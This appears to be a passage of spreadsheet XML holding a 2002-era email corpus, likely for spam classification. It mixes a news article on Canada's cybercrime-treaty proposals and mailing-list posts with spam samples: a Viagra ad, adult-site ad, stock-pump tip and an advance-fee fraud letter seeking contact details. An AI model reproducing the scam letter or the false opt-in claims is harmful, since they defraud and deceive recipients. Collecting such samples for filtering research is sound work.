 possession of computer viruses, authorize police to order Internet 
 providers to retain logs of all Web browsing for up to six months, and 
 permit police to obtain a search warrant allowing them to find "hidden 
 electronic and digital devices" that a suspect might be concealing. In 
 most circumstances, a court order would be required for government 
 agents to conduct Internet monitoring.
 Canada and the United States are nonvoting members of the Council of 
 Europe, and representatives from both countries' police agencies have 
 endorsed the controversial cybercrime treaty 
 &lt;http://conventions.coe.int/Treaty/EN/CadreListeTraites.htm&gt;, which has 
 drawn protests from human rights activists and civil liberties groups. 
 Of nearly 50 participating nations, only Albania has formally adopted 
 &lt;http://conventions.coe.int/Treaty/EN/searchsig.asp?NT=185&amp;CM=8&amp;DF=27/08/02&gt;, 
 or ratified, the treaty.
 Michael Geist &lt;http://aix1.uottawa.ca/%7Egeist/&gt;, a professor at the 
 University of Ottawa who specializes in e-commerce law, says that the 
 justification for adopting such sweeping changes to Canadian law seems 
 weak.
 "It seems to me that the main justification they've given for all the 
 changes is that we want to ratify the cybercrime treaty and we need to 
 make changes," Geist said. "To me that's not a particularly convincing 
 argument. If there are new powers needed for law enforcement authority, 
 make that case."
 Geist added that "there's nothing in the document that indicates (new 
 powers) are needed. I don't know that there have been a significant 
 number of cases where police have run into problems."
 Probably the most sweeping change the legal blueprint contemplates is 
 compelling Internet providers and telephone companies to reconfigure 
 their networks to facilitate government eavesdropping and data-retention 
 orders. The United States has a similar requirement, called the 
 Communications Assistance for Law Enforcement Act 
 &lt;http://www.epic.org/privacy/wiretap/calea/calea_law.html&gt;, but it 
 applies only to pre-Internet telecommunications companies.
 "It is proposed that all service providers (wireless, wireline and 
 Internet) be required to ensure that their systems have the technical 
 capability to provide lawful access to law enforcement and national 
 security agencies," according to the proposal. Companies would be 
 responsible for paying the costs of buying new equipment.
 Sarah Andrews, an analyst at the Electronic Privacy Information Center 
 &lt;http://www.epic.org/&gt; (EPIC) who specializes in international law, says 
 the proposal goes beyond what the cybercrime treaty specifies. "Their 
 proposal for intercept capability talks about all service providers, not 
 just Internet providers," Andrews said. "The cybercrime treaty deals 
 only with computer data." EPIC opposes 
 &lt;http://www.privacyinternational.org/issues/cybercrime/coe/ngo_letter_601.htm&gt; 
 the cybercrime treaty, saying it grants too much power to police and 
 does not adequately respect privacy rights.
 Another section of the proposal says the Canadian Association of Chiefs 
 of Police recommends "the establishment of a national database" with 
 personal information about all Canadian Internet users. "The 
 implementation of such a database would presuppose that service 
 providers are compelled to provide accurate and current information," 
 the draft says.
 Gus Hosein, a visiting fellow at the London School of Economics and an 
 activist with Privacy International, calls the database "a dumb idea."
 "Immediately you have to wonder if you're allowed to use anonymous 
 mobile phones or whether you're allowed to connect to the Internet 
 anonymously," Hosein said.
 A representative for George Radwanski 
 &lt;http://www.privcom.gc.ca/au_e.asp&gt;, Canada's privacy commissioner, said 
 the office is reviewing the blueprint and does not "have any comments on 
 the paper as it stands."
 Comments on the proposal can be sent to la-al@justice.gc.ca 
 &lt;mailto:la-al@justice.gc.ca&gt; no later than Nov. 15.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Online Doctors will fill your Viagra Prescription Now!!!                QEEB
</t>
  </si>
  <si>
    <t xml:space="preserve">YOUR SEX DRIVE SHOULD NEVER BE SECOND ON THE LIST!!!
 VIAGRA ONLINE NOW AND SHIPPED WITHIN 24 HOURS!
 http://buy-onlinepills.com/main2.php?rx=16372
 STAY HARD THE WAY YOU ONCE COULD!!!
 LESS THAN $7.00 PER DOSE TO MAKE IT ALL HAPPEN AGAIN!
 http://buy-onlinepills.com/main2.php?rx=16372
 DON'T SETTLE FOR LESS, KEEP YOUR LOVER HAPPY!
 http://buy-onlinepills.com/main2.php?rx=16372
 No Doctor office's to visit.  Simply fill  out our
 online form, and our U.S. Doctor will write your
 prescription and send it within 48 hours.
 http://buy-onlinepills.com/main2.php?rx=16372
 MOST MAJOR PRESCRIPTION DRUGS ALSO!
 CLICK BELOW FOR MORE INFORMATION:
 http://buy-onlinepills.com/main2.php?rx=16372
 We are strongly against sending unsolicited emails to those who do not wish to receive our special mailings. You have opted in to one or more of our affiliate sites requesting to be notified of any special offers we may run from time to time. We also have attained the services of an independent 3rd party to overlook list management and removal services. This is NOT unsolicited email. If you do not wish to receive further mailings, please click here http://greenzer.com/remove.php to be removed from the list. Please accept our apologies if you have been sent this email in error. We honor all removal requests.
</t>
  </si>
  <si>
    <t xml:space="preserve">Owne Byrne:
 &gt;Sure if you're willing to risk firing, lawsuits, etc. The last full time 
 &gt;job I had the sexual harassement seminar was pretty clear - yes you can 
 &gt;have relationships at the office, but its extremely difficult, and the 
 &gt;pitfalls are
 &gt;horrendous.
 Despite that, this is how a lot of couples meet.
 People tease me about Carolyn, that I just hired
 a lot of software engineering babes, and then
 chose the one I liked best. ;-)
 _________________________________________________________________
 Send and receive Hotmail on your mobile device: http://mobile.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status:  U
 To: rah@shipwright.com
 From: hacker@vudu.net
 Date: Thu, 03 Oct 2002 06:01:38 -0700 (PDT)
 Subject: Re: The 3rd Annual Consult Hyperion Digital Identity Forum
 The guy messed up his own URL. It should be
 http://www.digitalidforum.com which redirects to
 http://www.consult.hyperion.co.uk/digid3.html
 "R. A. Hettinga" wrote:
 &gt;
 &gt; Dear All,
 &gt;
 &gt; See www.digitalidentityforum.com for more details. Speakers
 include
 &gt; Microsoft and Liberty Alliance, UK central and local government,
 &gt; law
 &gt; enforcement, financial services (Egg and RBS/NatWest), EC
 Research
 &gt; Centre, a
 &gt; psychologist and others. Look forward to seeing you there.
 &gt;
 &gt; Regards,
 &gt; Dave Birch.
 &gt;
 &gt; --
 &gt; -- David Birch, Director, Consult Hyperion
 &gt; --
 &gt; -- tel +44 (0)1483 301793, fax +44 (0)1483 561657
 &gt; -- mail dave@chyp.com, web &lt;a
 href="http://mail.vudu.net//jump/http://www.chyp.com"&gt;http://www.chyp.com&lt;/a&gt;
 &gt; --
 &gt; -- See you at the 2nd Annual Digital Transactions Forum in
 &gt; Singapore
 &gt; -- October 16th/17th 2002, see
 &gt; &lt;a
 href="http://mail.vudu.net//jump/http://www.digitaltransactionsforum.com"&gt;http://www.digitaltransactionsforum.com&lt;/a&gt;/
 &gt;
 &gt; --- end forwarded text
 &gt;
 &gt;
 &gt; --
 &gt; -----------------
 &gt; R. A. Hettinga &amp;lt;mailto: rah@ibuc.com&amp;gt;
 &gt; The Internet Bearer Underwriting Corporation &amp;lt;&lt;a
 href="http://mail.vudu.net//jump/http://www.ibuc.com/&amp;gt"&gt;http://www.ibuc.com/&amp;gt&lt;/a&gt;;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; &amp;quot;... however it may deserve respect for its usefulness and
 &gt; antiquity,
 &gt; [predicting the end of the world] has not been found agreeable to
 &gt; experience.&amp;quot; -- Edward Gibbon, 'Decline and Fall of the
 Roman
 &gt; Empire'
 &gt;
 &gt; For help on using this list (especially unsubscribing), send a
 &gt; message to
 &gt; &amp;quot;dcsb-request@reservoir.com&amp;quot; with one line of text:
 &amp;quot;help&amp;quot;.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</si>
  <si>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=?GB2312?B?0rvN+KGwu92hsczsz8KjrNK71bnM7M/C1qotLS0tMjAwM8TqNNTCMcjVLS00?=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [zzzzteana] More Michael Jackson wierdness
</t>
  </si>
  <si>
    <t xml:space="preserve">I have to say I was surprised about Jacko dangling that kid of the
 balcony.
 Usually he just tosses them off...
 Boomboom.
 D
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">unsubscribe
 At 12:26 PM 7/24/02 -0400, rODbegbie wrote:
 &gt;Tabor J. Wells wrote:
 &gt; &gt; And where does it say production-ready? http://razor.sourceforge.net
 &gt; &gt; says at the top of the page:
 &gt; &gt;
 &gt; &gt; June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's
 &gt; &gt; Razor v2 is now available for public download.
 &gt;
 &gt;1)  I think the code is still very much pre-beta.
 &gt;
 &gt;2)  When you go to the "Download" page, it tells you "Fetch the latest
 &gt;versions of razor-agents and razor-agents-sdk packages"  It is not at all
 &gt;clear that these are development packages.
 &gt;
 &gt;The site is badly designed, and very misleading.  IMO.  The fact that the
 &gt;word "beta" appears in the middle of some introductory text on the front
 &gt;page is hardly a valid argument.  (Well accepted software design "fact":
 &gt;USERS DON'T READ *ANYTHING*)
 &gt;
 &gt;I get the impression that Vipul &amp; co are deliberately trying to mislead
 &gt;users into downloading the dev code in order to get more unwitting test
 &gt;sites.
 &gt;
 &gt;But that's just my opinion, I could be wrong.
 &gt;
 &gt;rOD.
 &gt;
 &gt;--
 &gt;Anyway... long story short...
 &gt;...is a phrase whose origins are complicated and rambling.
 &gt;
 &gt; &gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;
 &gt;
 &gt;
 &gt;
 &gt;-------------------------------------------------------
 &gt;This sf.net email is sponsored by:ThinkGeek
 &gt;Welcome to geek heaven.
 &gt;http://thinkgeek.com/sf
 &gt;_______________________________________________
 &gt;Razor-users mailing list
 &gt;Razor-users@lists.sourceforge.net
 &gt;https://lists.sourceforge.net/lists/listinfo/razor-users
 --
 Christopher VanOosterhout
 Torresen Marine, Inc.
 Internet Division
 http://www.torresen.com/
 http://www.marinedieseldirect.com/
 3126 Lake Shore Drive
 Muskegon, Michigan 49441
 231-759-8596
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: GConf registry (was Re: Pango problems)
</t>
  </si>
  <si>
    <t xml:space="preserve">I think this sort of discussion would be better on a GNOME list... I hate to
 complain, but this thread has been going on for several days. I don't really 
 mind deleting the messages every time, but there's really no reason for it 
 on this list. 
 __________________________________________________
 Do You Yahoo!?
 HotJobs - Search Thousands of New Jobs
 http://www.hotjobs.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Partnership.
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir, 
 With due respect and humility I write you this letter which I believe you
 would
 be of great assistance to my children and I.
 I got your contact through my husband commercial address book and believed
 that
 you must be a trust worthy and reliable person that will not like to
 intimidate me
 or betray my trust after hearing this news. I am a native of KONOBO in the
 KEREMA
 local district of SIERRA LEONE in West Africa and the wife of Late DR.
 MUNDI A.
 KOJO who was assassinated by the rebel forced loyal to Major John Paul
 Koromah
 because he was the Director General National Gold and Diamond Mining
 Corporation
 of Sierra Leone. Few days before my husband was assassinated, he 
 instructed me
 and my children (Ibrahim and Amina) to move out of Sierra Leone immediately,
 before the powerful Economic community of West African States (ECOMOG)
 forces
 intervened, which eventually resulted into a brutal civil war. My children
 and I
 managed to escape to Togo through the help of my husband's friend. We came
 into
 Togo with some valuables including a cash sum of $25MILLION(TWENTY FIVE
 MILLION
 UNITED STATES DOLLARS ONLY) in two trunks boxes which I have deposited
 with a
 Trust Company here in Togo and special arrangement has been made with the
 currier
 company who will freight the money to your country.
 Meanwhile, I want to leave Togo entirely with this money for investment in
 your
 country because of a stable political situation there and mostly for the
 future of
 my children. I want you to please assist us to claim this fund from the
 Trust
 Company in any of their branches in Europe, after which the fund will be
 deposited
 into your account for investment in your country. You should also help us to
 source for good investment opportunity so that we can invest wisely in your
 country when the fund is finally confirmed in your account.
 We have it in mind to reward you handsomely for your assistance as we have
 resolved to give you 20% of the total sum for your help. But due to how I
 am being
 monitored by the Sierra Leonean Government Secret Agents, I will advice
 you to
 have the 
 deal concluded with my son (IBRAHIM KOJO). Please contact my son on this
 email:
 ibrahimkojo@caramail.com , immediately you receive this letter to enable us
 proceed in earnest towards retrieving the consignments and transferring
 same into
 your account.
 Your private Fax and Phone is needed in this transaction for private
 discussions. 
 Note: There is no risk involved in this business. 
 Remain Blessed, 
 MRS. ANNE  KOJO
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: AA Meetings the Hottest Place to Meet Women With Big Bucks
</t>
  </si>
  <si>
    <t xml:space="preserve">Church, AA, same diff?
 ;-).
 Cheers,
 RAH
 http://www.newsmax.com/archive/print.shtml?a=2002/9/18/161934
 NewsMax.com
 Wednesday, September 18, 2002
 AA Meetings the Hottest Place to Meet Women With Big Bucks
 If you're looking to hook up with female millionaires you could try some of
 the classier restaurants or clubs, but the best place of all is a certain
 New York City Alcoholics Anonymous meeting.
 According to a Details magazine story cited in the New York Post, "the No.
 1 location to score a megabucks babe is an Alcoholics Anonymous center on
 [New York's] Upper East Side.
 "It's the choicest meeting in town, right next to the Ralph Lauren store"
 on Madison Avenue, which features "rich vulnerable women," the mag's
 October issue says.
 AA officials were not overjoyed by having the address of their meeting
 place published, or being cited as the "in" place for finding loaded women
 - or rather, women who are loaded.
 "The purpose of our meetings is to let people share their experiences and
 help others find sobriety. It is not a place to pick up women!" an AA
 spokesman told The Post.
 O.K.
 Return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</si>
  <si>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Jakob Nielsen on Offshore Usability: "To save costs, some
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020917.html
 Date: Not supplied
 Jakob Nielsen on Offshore Usability[1]: "To save costs, some companies are 
 outsourcing Web projects to countries with cheap labor. Unfortunately, these 
 countries lack strong usability traditions and their developers have limited 
 access -- if any -- to good usability data from the target users." 
 Offshore usability is a specific case of the general "offshore design" problem. 
 Put simply, software teams are not successful when 
 design or management are done in a different physical location than 
 programming. Once I actually had a job where I was in New York, my direct 
 manager was in Singapore, _his_ manager was in Hyderabad, and if I needed 
 any management input I had literally no choice but to go to the CEO because at 
 least he was awake during the same hours as I was. You can't get things done 
 like this. A good project team relies on hundreds of small interactions a day. 
 Here in the Fog Creek offices, we have 10 small conversations about FogBUGZ 3.0 
 development every day. 
 What I don't understand is people who think it's OK to move the developers ten 
 time zones away from their managers and expect good results. Those same people 
 would scream bloody murder if you told them that you were going to 
 send the whole _management_ team to Bangalore or Beijing.
 [1] http://www.useit.com/alertbox/20020916.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: TRAVELMAN: if it's Tuesday, it must be London...
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, it wouldn't be my own vanity list if I didn't forward at least a 
 little purely self-interested data.
 This week is my Europe Week. In classic TRAVELMAN fashion, I'm hitting 
 two nights each in Paris, London, Hamburg, and Copenhagen.
 I get to cure Rob's brain-pains this weekend, though at risk of missing 
 the big concert in London Sunday :-(
 &gt; Around Town
 &gt; Channel 4's Indian Summer
 &gt;
 &gt; As England meets India in four test matches this Summer, Channel 4 
 &gt; brings together a host of activities reflecting Indian life in a free 
 &gt; event held over the weekend (27/28 July). A huge screen in Regent's 
 &gt; Park will bring coverage of the first Test Match live from Lords 
 &gt; throughout the weekend. Marylebone Green will be the setting for a 
 &gt; chance to sample a mix of Indian food, music and film; an 8-piece 
 &gt; Indian-style brass band will be performing Bollywood tunes, and there 
 &gt; will be live DJ sets as well as performance by The Angel Dancers, who 
 &gt; have performed with Bollywood stars around the world. In the evening 
 &gt; (27), there will be an open-air screening of the comedy hit 'Monsoon 
 &gt; Wedding'. A live concert by award-winning, British-Asian artist Nitin 
 &gt; Sawhney will bring the weekend to a climax on 28 July, with special 
 &gt; guests including Badmarsh &amp; Shri and Asian Dub Foundation.
 &gt;
 &gt; 27-28 July, 10.30am-9pm, Marylebone Green, Regent's Park. Baker Street/ 
 &gt; Great Portland Street/ Regent's Park tube
 Instead, I'm arriving in London on Monday morning, staying through a 
 show of Andrew Lloyd Weber's new production, Bombay Dreams
 &gt; Bombay Dreams Set to be the latest in a long line of Andrew Lloyd 
 &gt; Webber smash hits comes 'Bombay Dreams', based on the book by Meera 
 &gt; Syal, and lyrics by AR Rahman, whose last project was the 
 &gt; Oscar-nominated 'Lagaan'. The project cost 4 million and doesn't 
 &gt; feature a single note of Lloyd Webber's music - which may or may not be 
 &gt; a good thing!
 &gt;
 &gt; Until 29 Sept, 7.45pm Mon-Tue &amp; Fri, 3pm &amp; 7.45pm.Wed &amp; Sat, Apollo 
 &gt; Victoria, Wilton Road, SW1 (0870 4000 650). Victoria tube/rail.
 I'll be visiting a cousin-in-law (my cousin's visa is still in the 
 works... a looong process).
 The next stop is to visit a cousin's family proper, and a niece I 
 haven't met since she was born 3-4 years ago. Should be a blast!
 Finally, Friday and Saturday of next week will be Copenhagen for 
 Henrik's second wedding... to the same woman, tho! :-)
 Bon voyage,
    Rohit
 PS. Yes, it's egotistical to wish oneself a "Bon Voyage". Screw it, it's 
 my list, dammit!
 ---
 My permanent email address is khare@alumni.caltech.edu
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 06, 2002 at 02:04:11PM +0100, Niall Brady wrote:
 &gt; &gt;(guess who inspired them?).  pc hardware is dumb, so you'll need to use
 &gt; &gt;a floppy.  otoh, every jumpstart config i've seen required rarp plus
 &gt; &gt;plugging the new box's ethernet+ip into a file.  a kickstart boot can
 &gt; &gt;just use a dhcp server.
 &gt; Aye, but it'll still need a /boot/kickstart/$VER/$IP-kickstart won't it
 &gt; to proceed automatically?  [or am I completely off track there?]
 it's been a while since i did a kickstart install.  my memory is that
 you put a file on a standard redhat boot disk that essentially scripts
 the install.  there are a slew of options - you can have it fetch it's
 install script from a tftpd server for instance (similar to jumpstart),
 or it can all be on the floppy.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</si>
  <si>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Gary Lawrence Murphy wrote:
 &gt;and say hello to the cool:  Oooo ... /this/ is going to cause some stir ...
 Of course not.  Some people just don't want to be confused by the facts.
 &gt;SUMMARY
 &gt;
 &gt;As part of an ongoing NASA/UAH joint project, Dr. John Christy of UAH
 &gt;and Dr. Roy Spencer of NASA's Marshall Space Flight Center use data
 &gt;gathered by microwave sounding units (MSUs) on National Oceanic and
 &gt;Atmospheric Administration TIROS-N satellites to get accurate, direct
 &gt;measurements of atmospheric temperatures for almost all regions of the
 &gt;Earth [...]
 But some plonker will come up with yet another computer model
 predicting global warming and storms and floods in 50 years even
 though it can't predict next week's weather.  And predict widespread
 cooling in some parts of the globe (which is now part of global
 "warming").  And will get plenty of publicity for even more conclusive
 scaremong^H^H^H^H^H^H^H^H^H proof.
 &gt;[...]
 &gt;Globally, however, the satellite data show a cooling trend of 0.03
 &gt;degrees Celsius per decade since the first NOAA TIROS-N satellites
 &gt;went into service.
 Umpteen studies have already shown that temperature variations, when
 even detectable in the noise, go either way depending on which data
 you look at.
 &gt;Of great concern to scientists is the lack of consistency in the way
 &gt;readings are taken [...] the construction of
 &gt;nearby roads, parking lots, runways and buildings may cause the
 &gt;temperature to rise a little due of urbanization. This temperature
 &gt;change may be an artifact of a local "asphalt effect" rather than a
 &gt;long-term widespread climate change.
 One study from Vienna showed long-term warming from thermometers at
 the airport, and none from other sites.  Another study with data from
 Antarctica which was touted as supporting global warming while being
 free from this urbanization effect later turned out to be dominated by
 the time of day at which the airplane that made the measurements flew
 (I may have mentioned this one b4...)
 "There are no facts, only interpretations."
 - Friedrich Nietzsche.
 "Bullshit!"
 - Rob.
      .-.                                                               .-.
     /   \           .-.                                 .-.           /   \
    /     \         /   \       .-.     _     .-.       /   \         /     \
   /       \       /     \     /   \   / \   /   \     /     \       /       \
  /         \     /       \   /     `-'   `-'     \   /       \     /         \
             \   /         `-'                     `-'         \   /
              `-'                                               `-'
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002 17:10:48 +0100, John Hinsley &lt;johnhinsley@blueyonder.co.uk&gt; wrote:
 &gt; No, the problem is that what plip expects is GL/glut.h (amongst other things) 
 &gt; which were there in 7.2 but have vanished in 7.3. 
     Yeah, I know what you mean.  Here's the trick:
     Remove the Nvidia drivers. Yeah, I know it's a pain...
     Load BOTH mesa, mesa-demos and basically everything that comes in the mesa rpm.   
     THEN load NVidia; it'll know what to do.
     ...but it seems like I had to do this on 7.2, too.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</si>
  <si>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How about rsync.
 It doesn't only work for remote files.
 MArk
 On Fri, 2002-07-19 at 14:28, Niall O Broin wrote:
 &gt; I have about 60G of data which I need to copy from one disk to another.
 &gt; However, I'm not sure how I should best copy it. The problem is the bulk of
 &gt; the data is images and most of these image have two directory entries i.e.
 &gt; there is a hard link to each file. If I copy them using cp -a or my usual
 &gt; favourite of find .|cpio -pmd other_dir it's going to copy each file twice,
 &gt; which is not what I want. dump / restore would take care of this if the
 &gt; source filesystem wasn't reiserfs :-( Any suggestions ?
 &gt; 
 &gt; 
 &gt; Niall
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt; List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-04
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Perl CMS Systems
     posted by ziggy on Tuesday September 03, @05:00 (tools)
     http://use.perl.org/article.pl?sid=02/09/02/1827239
 1998 Perl Conference CD Online
     posted by gnat on Tuesday September 03, @19:34 (news)
     http://use.perl.org/article.pl?sid=02/09/03/2334251
 Bricolage 1.4.0 Escapes!
     posted by chip on Tuesday September 03, @19:57 (tools)
     http://use.perl.org/article.pl?sid=02/09/04/002204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</si>
  <si>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TEEN LESBIAN WEBSITE
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;SEE US FOR FREE! &lt;br&gt;
 &lt;br&gt;
 Hi there,&lt;br&gt;
 &lt;br&gt;
 Me and my slutty amateur girlfriends just put up our very 1st website.&lt;br&gt;
 We made our website to get us modeling jobs and movie deals, so it is FREE (for now). &lt;br&gt;
 Its an adult site with nudity and stuff, so no one under 18 please. &lt;br&gt;
 &lt;br&gt;
 It is 100% FREE!&lt;br&gt;
 &lt;b&gt;&lt;a href="http://6.lspeedhost.net/abg/?aid=283360"&gt;GO HERE&lt;/a&gt;&lt;/b&gt; , check us out, and help us get discovered.&lt;br&gt;
 &lt;br&gt;
 XOXO Jenni&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;You have received this advertisement because you have opted in to receive &lt;br&gt;
 free adult internet offers and specials through our affiliated websites.&lt;br&gt;
 If you do not wish to receive further emails or have received the &lt;br&gt;
 email in error you may opt-out of our database by clicking here: &lt;br&gt;
 &lt;a href="http://16.lspeedhost.net/alw/takemeoff.html"&gt;CLICK HERE&lt;/a&gt;&lt;br&gt;
 Please allow 24hours for removal.&lt;br&gt;
 This e-mail is sent in compliance with the Information Exchange Promotion and&lt;br&gt;
 Privacy Protection Act. &lt;br&gt;
 section 50 marked as 'Advertisement' with valid 'removal' instruction.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Checking Account update
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_864650872074
 Content-Type: text/plain;
 	charset="us-ascii"
 Content-Transfer-Encoding: 7BIT
 Special situation trading Advisory
 Dear Valued subscribers,
 We sometimes approach our analysts for their thoughts on emerging market sectors we're interested in. On certain occasions, they come to us with intriguing insights of certain aspects of the market that have caught their attention.
 As you know our track record speaks for itself we are happy to bring you another situation with HUGE upside potential we think this could be the one that when we look back shortly everyone will be saying I should have more.
 For more info http://terra.es/personal9/invdaily1/
 Remember: Nothing Ventured Nothing Gained
 ------=_NextPart_864650872074
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;table width=3D"600"&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;P ALIGN=3D"LEFT"&gt;Dear Reader:&lt;br&gt;&lt;br&gt; 
 We sometimes approach our analysts for their thoughts on emerging market =
 sectors we're interested in. On certain occasions, they come to us with =
 intriguing insights of certain aspects of the market that have caught their =
 attention.&lt;br&gt;&lt;br&gt;
 As you know our track record speaks for itself we are happy to bring you =
 another situation with HUGE upside potential we think this could be the one =
 that when we look back shortly everyone will be saying I should have more.=
 &lt;br&gt;&lt;br&gt;
 For more info &lt;a href=3D"http://terra.es/personal9/invdaily1/" target=3D"_"&gt;CLICK =
 HERE!!!&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 Remember: Nothing Ventured Nothing Gained&lt;br&gt;&lt;br&gt;
 &lt;/FONT&gt;&lt;/P&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_864650872074--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</si>
  <si>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 change of plans
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello you two,
 I am so sorry Catherine for not writing recently. I have just been vv busybeing a working mother and sometimes it all gets too much you know!! i cannot wait to see you both although we may meet at the airport on the 16/6 as that's the day we're going to france but i will see you both at Bronagh's house for her 30th which we're going to on the way back from the airport. I am so excited about seeing you!!! liitle Eva ( Aine) was born on Tuesday
  She is absolutely incredible. poor Bronagh is 11 dsays over!!
 Sounds like you've been having an amazing time. Hope you won't be too depressed to be back!!
 Lots of love
 Deirdre
 "Justin Mason" &lt;jm@jmason.org&gt; wrote:
 &lt;  
 &lt;  Just a quick note -
 &lt;  
 &lt;  we've decided to go up to Annapurna Base Camp instead of
 &lt;  the Jomsom trek - it's a bit more impressive visually
 &lt;  (if a little soggier).   So as of tomorrow morning, ourselves
 &lt;  and our guide Bhadra will be leaping like gazelles up 4000-odd
 &lt;  metres into the Himalayas... we'll be sure to take a few
 &lt;  pics on the way.  Sorry for the bonus mail, but we have to tell
 &lt;  someone because we forgot to tell the Irish embassy ;)
 &lt;  
 &lt;  Next update in 10-14 days, ish,
 &lt;  
 &lt;  --j.
 &lt;  
 &lt;  
 &lt;  
 &lt;  _______________________________________________
 &lt;  Travelogue mailing list
 &lt;  Travelogue@jmason.org
 &lt;  http://jmason.org/mailman/listinfo/travelogue
 &lt;  
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] veritas backup on linux ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes indeed - there should be an agents directory on the Veritas CD - in
 the unix subdirectory there should be a file called be_agnt.tar which
 needs to be installed and configured.  I am not sure - but I think that
 you may need to purchase a serial number in order to get this to work..
 Fergal.
 &gt; -----Original Message-----
 &gt; From: John P. Looney [mailto:valen@tuatha.org] 
 &gt; Sent: 19 August 2002 10:34
 &gt; To: Irish LUG list
 &gt; Subject: [ILUG] veritas backup on linux ?
 &gt; 
 &gt; 
 &gt;  I've a solaris box &amp; a windows 2000 box, both with DLT 
 &gt; drives, controlled by Veritas Backup.
 &gt; 
 &gt;  Can I install some sort of client on the linux box to enable 
 &gt; it to be backed up ? A browse of the Veritas site is a little 
 &gt; quiet on this front.
 &gt; 
 &gt; Kate
 &gt; 
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie 
 &gt; http://www.linux.ie/mailman/listinfo/ilug for 
 &gt; (un)subscription information. List maintainer: listmaster@linux.ie
 &gt; 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 06 Aug 2002 12:56:17 BST, kevin lyda said:
 &gt;
 &gt;sorry, i missed this.  redhat supplies something similar called kickstart
 &gt;(guess who inspired them?).  pc hardware is dumb, so you'll need to use
 &gt;a floppy.  otoh, every jumpstart config i've seen required rarp plus
 &gt;plugging the new box's ethernet+ip into a file.  a kickstart boot can
 &gt;just use a dhcp server.
 Aye, but it'll still need a /boot/kickstart/$VER/$IP-kickstart won't it
 to proceed automatically?  [or am I completely off track there?]
 -- 
 	Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: earthviewer apps Re: whoa
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 8 Sep 2002, Gordon Mohr wrote:
 --]Gary Lawrence Murphy cynicizes:
 --]&gt; Hmmm, just as I thought.  In other words, it has no practical uses
 --]&gt; whatsoever ;)
 --]
 --]Online gaming continues to grow. Screw "Britannia",
 --]real-life Britain would be a fun world to wander/
 --]conquer/explore virtually, in role-playing or real-
 --]time-strategy games.
 Andthus....Geocaching.....this would make a nice little "let me check this
 set of coord out before we trek into 10 feet of quicksand"
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get on the Bus.. gbvzzzz
</t>
  </si>
